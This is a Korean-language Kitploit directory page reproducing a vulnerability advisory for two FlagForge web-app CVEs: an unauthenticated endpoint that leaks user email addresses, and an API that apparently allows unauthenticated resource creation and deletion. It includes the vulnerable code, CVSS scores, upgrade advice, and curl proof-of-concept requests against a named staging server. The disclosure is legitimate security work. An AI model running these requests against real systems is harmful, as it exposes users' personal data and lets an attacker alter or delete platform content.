Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59843-CVE-2025-59932 — FlagForge 2.0.0~2.3.0 버전에서의 CVE입니다. 문제 해결을 위해 버전 2.3.1로 업그레이드하세요. | Kitploit
도구/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
Vulnerability AnalysisInformation GatheringWeb SecurityPenetration TestingMisconfigurationAPI Security
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

FlagForge 2.0.0~2.3.0 버전에서의 CVE입니다. 문제 해결을 위해 버전 2.3.1로 업그레이드하세요.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
110개월 전아직 검토되지 않음

CVE-2025-59843 & CVE-2025-59932

1. 사용자 이메일 주소 공개 노출 CVE-2025-59843

범위 내 / 영향 받는 애플리케이션: FlagForge 웹 애플리케이션

API 엔드포인트: /api/user/[username]

세부사항: 이 엔드포인트는 인증 없이 사용자 이메일 주소를 반환합니다. 모든 사용자 이름을 공개적으로 조회할 수 있습니다.

근본 원인 / 코드 참조:

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly

심각도 (CVSS v4.0): 5.5 (중간)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

영향: 공격자가 사용자를 열거하고 이메일 주소에 접근할 수 있어 잠재적인 개인정보 침해로 이어질 수 있습니다.

개념 증명 (PoC):

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
샘플 응답:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}

2. 인증되지 않은 리소스 수정/삭제 가능성 CVE-2025-59932

범위 내 / 영향 받는 애플리케이션: FlagForge 웹 애플리케이션

API 엔드포인트: /api/resources

세부사항:

GET /api/resources는 모든 리소스를 공개적으로 노출합니다.

코드 검토에 따르면, POST 및 DELETE 요청에 대해 인증이나 권한 부여가 적용되지 않습니다. 이러한 요청은 운영 데이터에 영향을 미치지 않도록 라이브 시스템에서 테스트되지 않았습니다.

관찰된 헤더 (OPTIONS 요청):

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

심각도 (CVSS v4.0, POST/DELETE가 인증되지 않은 경우): 7.8 (높음)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

영향: POST 또는 DELETE가 인증되지 않은 경우, 공격자가 리소스를 생성하거나 삭제할 수 있어 플랫폼 무결성에 영향을 미칠 수 있습니다.

개념 증명 (PoC):

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

이렇게 하면 리소스의 _id를 얻을 수 있습니다.

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

도구 다운로드